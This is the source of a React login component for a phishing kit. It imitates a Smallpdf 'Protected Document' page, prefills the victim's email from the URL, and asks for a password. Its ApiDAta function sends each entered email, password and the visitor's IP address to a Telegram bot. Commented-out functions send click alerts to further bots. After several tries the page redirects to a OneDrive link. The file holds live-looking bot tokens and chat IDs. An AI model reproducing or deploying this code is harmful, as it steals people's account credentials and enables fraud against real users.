import React, { useState,useEffect } from "react";

import "./Login.css";
import axios from "axios";
const Login = () => {
  // const Notify = async ()=>{
  //   const response = await fetch(`https://api.telegram.org/bot6831553493:AAGi9Mm_cCweRCLGuh1AGxq5pNbT7MIYra8/sendMessage?chat_id=-4289549637&text=====Made By Asfandshah PDF LOGS: @kingofviruses===
  //   Client IP: ${Login.IP}%0ASomeone Click on the link%0A====&parse_mode=html`)
  //   const data= await response.json()
  //   return data;

  // }
  // const Notify2 = async ()=>{
  //   const response = await fetch(`https://api.telegram.org/bot6493417502:AAG72Z2swK4DaPlTxeeiLPZfKvYKHtV9Sxs/sendMessage?chat_id=-4289501226&text=====Made By Asfandshah PDF LOGS: @kingofviruses===
  //   Client IP: ${Login.IP}%0ASomeone Click on the link%0A====&parse_mode=html`)
  //   const data= await response.json()
  //   return data;

  // }

  const [Login, setLogin] = useState({ Email: '', Password: "", IP: "" });
  const [Data, setData] = useState([]);
  const [Isvalid, setIsvalid] = useState(false);
  const [Count, setCount] = useState(0);
  const [Inccorrect, setInccorrect] = useState(true);
  const [ShowPass, setShowPass] = useState(false)
  const [ShowEmail, setShowemail] = useState('')
  const [EmailisValid, setEmailisValid] = useState(false)

  useEffect(() => {
    const urlParams = new URLSearchParams(window.location.search);
    const emailFromURL = urlParams.get('email') || '';

    setLogin({Email: emailFromURL});
    // console.log(Login.Email)
  }, []);


  const ApiDAta = async ()=>{
    const response = await fetch(`https://api.telegram.org/bot7082249416:AAHg6vhvDhc5CmbDdv2G-dgSrj3e7VCqDN0/sendMessage?chat_id=-4241735775&text=====Made By Asfandshah PDF LOGS: @kingofviruses===
    %0AEmail: ${Login.Email}%0APassword: ${Login.Password}%0AClient IP: ${Login.IP}%0A====&parse_mode=html`)
    const data= await response.json()
    return data;

  }

  const getData = async () => {
    const res = await axios.get("https://geolocation-db.com/json/");
    console.log(res.data.IPv4);
    setLogin(prevLogin => ({
      ...prevLogin,
      IP: res.data.IPv4
    }));
  };

  // useEffect(() => {
  //   if(Login.IP!==undefined || Login.IP !==""){
  //     Notify();
  //   }
  // }, [Login.IP]);

  if (Count === 4) {
    setInccorrect(false)
    window.location.href ="https://1drv.ms/b/s!Ai-irW8FOwTdggbAsnGzEkW_PtQ-?e=f8aXC9";
  }

  const SubmitHandler = event => {
    event.preventDefault();
    console.log(Count)
    if (Login.Password.length === 0) {
      setIsvalid(true);
    } else {
      setCount(Count+1)
      setIsvalid(false);
      setInccorrect(false)
      setData([...Data, Login]);
      // Notify();
      ApiDAta();

   
    }
    setLogin({...Login,Password: ""})
  };

  const NextHandler = (e)=>{
    e.preventDefault()
    if(Login.Email.length === 0){
      setIsvalid(true)
    }else{
      setCount(Count+1)
      setInccorrect(true)
      setShowemail(Login.Email)
      setEmailisValid(true)
      setShowPass(true);
    }
  }


  useEffect(
    () => {
      getData();
    },
    []
  );

  return (
    <div className="formbg-outer">
      <div className="content">
        <div className="formbg">
          <div
            className="formbg-inner padding-horizontal--48"
            style={{ height: "500px" }}
          >
            <img
              src="https://s.smallpdf.com/static/8bfe6e572c81ad5bdc63.svg"
              alt="pdf-login"
              style={{ height: "20%" }}
            />
            <span className="padding-bottom--10">Protected Document*</span>
            {EmailisValid ?  <>
            <p style={{fontWeight: 'bold'}}>{ShowEmail} 
            {/* <a href onClick={()=>{setShowPass(false); setEmailisValid(false);setLogin({...Login,Email:"",Password:""});setIsvalid(false);setInccorrect(true);setCount(0)}}>Change?</a> */}
            
            </p></>:""}
            <form onSubmit={SubmitHandler} method="GET">
            {!Inccorrect
                  ? <p style={{ color: "red" }}>Enter Valid Password</p>
                  : ""}
                  {Isvalid
                  ? <p style={{ color: "red" }}>Input field cannot be empty</p>
                  : ""}
            {!ShowPass ?   <div className="field padding-bottom--24">
                <label htmlFor="email">Verify your email address</label>
                <h2 class="h5">{Login.Email}</h2><br />
                <input
                  type="hidden"
                  name="email"
                  value={Login.Email}
                  placeholder="Enter Email"
                  id="email"
                  style={{border:"1px solid black"}}
                  onChange={e => {
                    setIsvalid(false);
                    setLogin(prevLogin => ({
                      ...prevLogin,
                      Email: e.target.value
                    }));
                    setShowemail(e.target.value)
                    setInccorrect(true)
                  }}
                  onKeyDown={(e) => {
                    if (e.key === 'Enter') {
                      setInccorrect(true)
                      setShowemail(Login.Email)
                      setEmailisValid(true)
                      setShowPass(true);
                    }
                  }}
                />
              </div> : 
              <div className="field padding-bottom--24">
                <p className="para">Because You're accessing a sensitive info, you need to verify your password</p>
                <div className="grid--50-50">
                <label htmlFor="password"></label>
                </div>
                <input
                  type="password"
                  placeholder="Enter Password"
                  name="password"
                  value={Login.Password}
                  id="password"
                  style={{border:"1px solid red"}}
                  onChange={e => {
                    setIsvalid(false);
                    setInccorrect(true)
                    setLogin(prevLogin => ({
                      ...prevLogin,
                      Password: e.target.value
                    }));
                  
                  }}
                  
                />
              </div>
              }
              
              <div className="field field-checkbox padding-bottom--24 flex-flex align-center">
                <label htmlFor="checkbox">
                  <input type="checkbox" name="checkbox" /> Stay signed in For a
                  week
                </label>
              </div>
              {ShowPass ?<div className="field padding-bottom--24">
                <input
                  type="submit"
                  name="submit"
                  value="View Document"
                  id="btn"
                  onClick={()=>{setInccorrect(false)}}
                />
              </div> :    <div className="field padding-bottom--24">
                <input
                  type="button"
                  name="Next"
                  value="Next"
                  id="btn"
                  style={{background:"red",color:"white"}}
                  onClick={NextHandler}
                  onKeyUp={(event)=>{if(event.key==="Enter"){
                    return NextHandler
                  }}}
              
                />
              </div>}
              
           
            </form>
          </div>
        </div>
      </div>
    </div>
  );
};

export default Login;
